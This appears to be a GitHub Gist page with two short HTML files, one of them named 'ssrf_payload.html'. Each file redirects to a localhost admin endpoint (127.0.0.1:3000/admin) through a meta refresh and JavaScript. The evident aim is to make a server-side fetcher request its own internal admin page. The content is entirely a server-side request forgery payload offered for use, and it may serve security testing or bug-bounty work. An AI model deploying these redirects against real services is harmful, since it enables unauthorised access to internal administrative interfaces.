Skip to content

Instantly share code, notes, and snippets.

@Tahmidrk
Tahmidrk / redir.html
Created February 21, 2026 12:04
redir
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://127.0.0.1:3000/admin">
<script>window.location.href='http://127.0.0.1:3000/admin';</script>
</head>
<body>redirecting...</body>
</html>
@Tahmidrk
Tahmidrk / ssrf_payload.html
Last active February 21, 2026 12:03
test page
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="0;url=http://127.0.0.1:3000/admin">
</head>
<body>
<script>window.location='http://127.0.0.1:3000/admin';</script>
</body>
</html>